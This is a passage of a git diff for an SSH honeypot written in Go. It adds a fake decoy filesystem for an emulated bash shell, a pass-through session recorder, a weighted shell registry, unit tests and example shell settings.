fs.writeFile("/tmp/notes.txt", "TODO: Update SSL certificates\n") + + return fs +} + +// resolvePath converts a potentially relative path to an absolute one. +func resolvePath(cwd, p string) string { + if !strings.HasPrefix(p, "/") { + p = cwd + "/" + p + } + return path.Clean(p) +} + +func (fs *filesystem) lookup(p string) *fsNode { + p = path.Clean(p) + if p == "/" { + return fs.root + } + + parts := strings.Split(strings.TrimPrefix(p, "/"), "/") + node := fs.root + for _, part := range parts { + if node.children == nil { + return nil + } + child, ok := node.children[part] + if !ok { + return nil + } + node = child + } + return node +} + +func (fs *filesystem) exists(p string) bool { + return fs.lookup(p) != nil +} + +func (fs *filesystem) isDirectory(p string) bool { + n := fs.lookup(p) + return n != nil && n.isDir +} + +func (fs *filesystem) list(p string) ([]string, error) { + n := fs.lookup(p) + if n == nil { + return nil, fmt.Errorf("ls: cannot access '%s': No such file or directory", p) + } + if !n.isDir { + return nil, fmt.Errorf("ls: cannot access '%s': Not a directory", p) + } + + names := make([]string, 0, len(n.children)) + for name, child := range n.children { + if child.isDir { + name += "/" + } + names = append(names, name) + } + return names, nil +} + +func (fs *filesystem) read(p string) (string, error) { + n := fs.lookup(p) + if n == nil { + return "", fmt.Errorf("cat: %s: No such file or directory", p) + } + if n.isDir { + return "", fmt.Errorf("cat: %s: Is a directory", p) + } + return n.content, nil +} + +func (fs *filesystem) mkdirAll(p string) { + p = path.Clean(p) + parts := strings.Split(strings.TrimPrefix(p, "/"), "/") + node := fs.root + for _, part := range parts { + if node.children == nil { + node.children = make(map[string]*fsNode) + } + child, ok := node.children[part] + if !ok { + child = &fsNode{name: part, isDir: true, children: make(map[string]*fsNode)} + node.children[part] = child + } + node = child + } +} + +func (fs *filesystem) writeFile(p string, content string) { + p = path.Clean(p) + dir := path.Dir(p) + base := path.Base(p) + + fs.mkdirAll(dir) + parent := fs.lookup(dir) + parent.children[base] = &fsNode{name: base, content: content} +} diff --git a/internal/shell/bash/filesystem_test.go b/internal/shell/bash/filesystem_test.go new file mode 100644 index 0000000..68cba52 --- /dev/null +++ b/internal/shell/bash/filesystem_test.go @@ -0,0 +1,140 @@ +package bash + +import ( + "sort" + "testing" +) + +func TestNewFilesystem(t *testing.T) { + fs := newFilesystem("testhost") + + // Standard directories should exist. + for _, dir := range []string{"/etc", "/root", "/home", "/var/log", "/tmp", "/usr/bin"} { + if !fs.isDirectory(dir) { + t.Errorf("%s should be a directory", dir) + } + } + + // Standard files should exist. + for _, file := range []string{"/etc/passwd", "/etc/hostname", "/root/.bashrc", "/tmp/notes.txt"} { + if !fs.exists(file) { + t.Errorf("%s should exist", file) + } + } +} + +func TestFilesystemHostname(t *testing.T) { + fs := newFilesystem("myhost") + content, err := fs.read("/etc/hostname") + if err != nil { + t.Fatalf("read /etc/hostname: %v", err) + } + if content != "myhost\n" { + t.Errorf("hostname content = %q, want %q", content, "myhost\n") + } +} + +func TestResolvePath(t *testing.T) { + tests := []struct { + cwd string + arg string + want string + }{ + {"/root", "file.txt", "/root/file.txt"}, + {"/root", "/etc/passwd", "/etc/passwd"}, + {"/root", "..", "/"}, + {"/var/log", "../..", "/"}, + {"/root", ".", "/root"}, + {"/root", "./sub/file", "/root/sub/file"}, + {"/", "etc", "/etc"}, + } + for _, tt := range tests { + got := resolvePath(tt.cwd, tt.arg) + if got != tt.want { + t.Errorf("resolvePath(%q, %q) = %q, want %q", tt.cwd, tt.arg, got, tt.want) + } + } +} + +func TestFilesystemList(t *testing.T) { + fs := newFilesystem("testhost") + + names, err := fs.list("/etc") + if err != nil { + t.Fatalf("list /etc: %v", err) + } + sort.Strings(names) + + // Should contain at least passwd, hostname, hosts. + found := map[string]bool{} + for _, n := range names { + found[n] = true + } + for _, want := range []string{"passwd", "hostname", "hosts"} { + if !found[want] { + t.Errorf("list /etc missing %q, got %v", want, names) + } + } +} + +func TestFilesystemListNonexistent(t *testing.T) { + fs := newFilesystem("testhost") + _, err := fs.list("/nonexistent") + if err == nil { + t.Fatal("expected error listing nonexistent directory") + } +} + +func TestFilesystemListFile(t *testing.T) { + fs := newFilesystem("testhost") + _, err := fs.list("/etc/passwd") + if err == nil { + t.Fatal("expected error listing a file") + } +} + +func TestFilesystemRead(t *testing.T) { + fs := newFilesystem("testhost") + content, err := fs.read("/etc/passwd") + if err != nil { + t.Fatalf("read: %v", err) + } + if content == "" { + t.Error("expected non-empty content") + } +} + +func TestFilesystemReadNonexistent(t *testing.T) { + fs := newFilesystem("testhost") + _, err := fs.read("/no/such/file") + if err == nil { + t.Fatal("expected error for nonexistent file") + } +} + +func TestFilesystemReadDirectory(t *testing.T) { + fs := newFilesystem("testhost") + _, err := fs.read("/etc") + if err == nil { + t.Fatal("expected error for reading a directory") + } +} + +func TestFilesystemDirectoryListing(t *testing.T) { + fs := newFilesystem("testhost") + names, err := fs.list("/") + if err != nil { + t.Fatalf("list /: %v", err) + } + + // Root directories should end with / + found := map[string]bool{} + for _, n := range names { + found[n] = true + } + for _, want := range []string{"etc/", "root/", "home/", "var/", "tmp/", "usr/"} { + if !found[want] { + t.Errorf("list / missing %q, got %v", want, names) + } + } +} diff --git a/internal/shell/recorder.go b/internal/shell/recorder.go new file mode 100644 index 0000000..bfcc7fb --- /dev/null +++ b/internal/shell/recorder.go @@ -0,0 +1,19 @@ +package shell + +import "io" + +// RecordingChannel wraps an io.ReadWriteCloser. In Phase 1.4 it is a +// pass-through; Phase 2.3 will add byte-level keystroke recording here +// without changing any shell code. +type RecordingChannel struct { + inner io.ReadWriteCloser +} + +// NewRecordingChannel returns a RecordingChannel wrapping rw. +func NewRecordingChannel(rw io.ReadWriteCloser) *RecordingChannel { + return &RecordingChannel{inner: rw} +} + +func (r *RecordingChannel) Read(p []byte) (int, error) { return r.inner.Read(p) } +func (r *RecordingChannel) Write(p []byte) (int, error) { return r.inner.Write(p) } +func (r *RecordingChannel) Close() error { return r.inner.Close() } diff --git a/internal/shell/recorder_test.go b/internal/shell/recorder_test.go new file mode 100644 index 0000000..d516274 --- /dev/null +++ b/internal/shell/recorder_test.go @@ -0,0 +1,43 @@ +package shell + +import ( + "bytes" + "io" + "testing" +) + +// nopCloser wraps a ReadWriter with a no-op Close. +type nopCloser struct { + io.ReadWriter +} + +func (nopCloser) Close() error { return nil } + +func TestRecordingChannelPassthrough(t *testing.T) { + var buf bytes.Buffer + rc := NewRecordingChannel(nopCloser{&buf}) + + // Write through the recorder. + msg := []byte("hello") + n, err := rc.Write(msg) + if err != nil { + t.Fatalf("Write: %v", err) + } + if n != len(msg) { + t.Errorf("Write n = %d, want %d", n, len(msg)) + } + + // Read through the recorder. + out := make([]byte, 16) + n, err = rc.Read(out) + if err != nil { + t.Fatalf("Read: %v", err) + } + if string(out[:n]) != "hello" { + t.Errorf("Read = %q, want %q", out[:n], "hello") + } + + if err := rc.Close(); err != nil { + t.Fatalf("Close: %v", err) + } +} diff --git a/internal/shell/registry.go b/internal/shell/registry.go new file mode 100644 index 0000000..2fd3ee4 --- /dev/null +++ b/internal/shell/registry.go @@ -0,0 +1,84 @@ +package shell + +import ( + "errors" + "fmt" + "math/rand/v2" + "sync" +) + +type registryEntry struct { + shell Shell + weight int +} + +// Registry holds shells with associated weights for random selection. +type Registry struct { + mu sync.RWMutex + entries []registryEntry +} + +// NewRegistry returns an empty Registry. +func NewRegistry() *Registry { + return &Registry{} +} + +// Register adds a shell with the given weight. Weight must be >= 1 and +// no duplicate names are allowed. +func (r *Registry) Register(shell Shell, weight int) error { + if weight < 1 { + return fmt.Errorf("weight must be >= 1, got %d", weight) + } + + r.mu.Lock() + defer r.mu.Unlock() + + for _, e := range r.entries { + if e.shell.Name() == shell.Name() { + return fmt.Errorf("shell %q already registered", shell.Name()) + } + } + + r.entries = append(r.entries, registryEntry{shell: shell, weight: weight}) + return nil +} + +// Select picks a shell using weighted random selection. +func (r *Registry) Select() (Shell, error) { + r.mu.RLock() + defer r.mu.RUnlock() + + if len(r.entries) == 0 { + return nil, errors.New("no shells registered") + } + + total := 0 + for _, e := range r.entries { + total += e.weight + } + + pick := rand.IntN(total) + cumulative := 0 + for _, e := range r.entries { + cumulative += e.weight + if pick < cumulative { + return e.shell, nil + } + } + + // Should never reach here, but return last entry as fallback. + return r.entries[len(r.entries)-1].shell, nil +} + +// Get returns a shell by name. +func (r *Registry) Get(name string) (Shell, bool) { + r.mu.RLock() + defer r.mu.RUnlock() + + for _, e := range r.entries { + if e.shell.Name() == name { + return e.shell, true + } + } + return nil, false +} diff --git a/internal/shell/registry_test.go b/internal/shell/registry_test.go new file mode 100644 index 0000000..d3a21db --- /dev/null +++ b/internal/shell/registry_test.go @@ -0,0 +1,107 @@ +package shell + +import ( + "context" + "io" + "testing" +) + +// stubShell implements Shell for testing. +type stubShell struct { + name string +} + +func (s *stubShell) Name() string { return s.name } +func (s *stubShell) Description() string { return "stub" } +func (s *stubShell) Handle(_ context.Context, _ *SessionContext, _ io.ReadWriteCloser) error { + return nil +} + +func TestRegistryRegisterAndGet(t *testing.T) { + r := NewRegistry() + sh := &stubShell{name: "test"} + + if err := r.Register(sh, 1); err != nil { + t.Fatalf("Register: %v", err) + } + + got, ok := r.Get("test") + if !ok { + t.Fatal("Get returned false") + } + if got.Name() != "test" { + t.Errorf("Name = %q, want %q", got.Name(), "test") + } +} + +func TestRegistryGetMissing(t *testing.T) { + r := NewRegistry() + _, ok := r.Get("nope") + if ok { + t.Fatal("Get returned true for missing shell") + } +} + +func TestRegistryDuplicateName(t *testing.T) { + r := NewRegistry() + r.Register(&stubShell{name: "dup"}, 1) + err := r.Register(&stubShell{name: "dup"}, 1) + if err == nil { + t.Fatal("expected error for duplicate name") + } +} + +func TestRegistryInvalidWeight(t *testing.T) { + r := NewRegistry() + err := r.Register(&stubShell{name: "a"}, 0) + if err == nil { + t.Fatal("expected error for weight 0") + } + err = r.Register(&stubShell{name: "b"}, -1) + if err == nil { + t.Fatal("expected error for negative weight") + } +} + +func TestRegistrySelectEmpty(t *testing.T) { + r := NewRegistry() + _, err := r.Select() + if err == nil { + t.Fatal("expected error from empty registry") + } +} + +func TestRegistrySelectSingle(t *testing.T) { + r := NewRegistry() + r.Register(&stubShell{name: "only"}, 1) + + for range 10 { + sh, err := r.Select() + if err != nil { + t.Fatalf("Select: %v", err) + } + if sh.Name() != "only" { + t.Errorf("Name = %q, want %q", sh.Name(), "only") + } + } +} + +func TestRegistrySelectWeighted(t *testing.T) { + r := NewRegistry() + r.Register(&stubShell{name: "heavy"}, 100) + r.Register(&stubShell{name: "light"}, 1) + + counts := map[string]int{} + for range 1000 { + sh, err := r.Select() + if err != nil { + t.Fatalf("Select: %v", err) + } + counts[sh.Name()]++ + } + + // "heavy" has weight 100 vs "light" weight 1, so heavy should get ~99%. + if counts["heavy"] < 900 { + t.Errorf("heavy selected %d/1000 times, expected >900", counts["heavy"]) + } +} diff --git a/internal/shell/shell.go b/internal/shell/shell.go new file mode 100644 index 0000000..8e8029c --- /dev/null +++ b/internal/shell/shell.go @@ -0,0 +1,33 @@ +package shell + +import ( + "context" + "io" + + "git.t-juice.club/torjus/oubliette/internal/storage" +) + +// Shell is the interface that all honeypot shell implementations must satisfy. +type Shell interface { + Name() string + Description() string + Handle(ctx context.Context, sess *SessionContext, rw io.ReadWriteCloser) error +} + +// SessionContext carries metadata about the current SSH session. +type SessionContext struct { + SessionID string + Username string + RemoteAddr string + ClientVersion string + Store storage.Store + ShellConfig map[string]any + CommonConfig ShellCommonConfig +} + +// ShellCommonConfig holds settings shared across all shell types. +type ShellCommonConfig struct { + Hostname string + Banner string + FakeUser string // override username in prompt; empty = use authenticated user +} diff --git a/oubliette.toml.example b/oubliette.toml.example index 7ea3044..a1943dc 100644 --- a/oubliette.toml.example +++ b/oubliette.toml.example @@ -22,3 +22,8 @@ password = "admin" db_path = "oubliette.db" retention_days = 90 retention_interval = "1h" + +[shell] +hostname = "ubuntu-server" +# banner = "Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 5.15.0-89-generic x86_64)\r\n\r\n" +# fake_user = "" # override username in prompt; empty = use authenticated user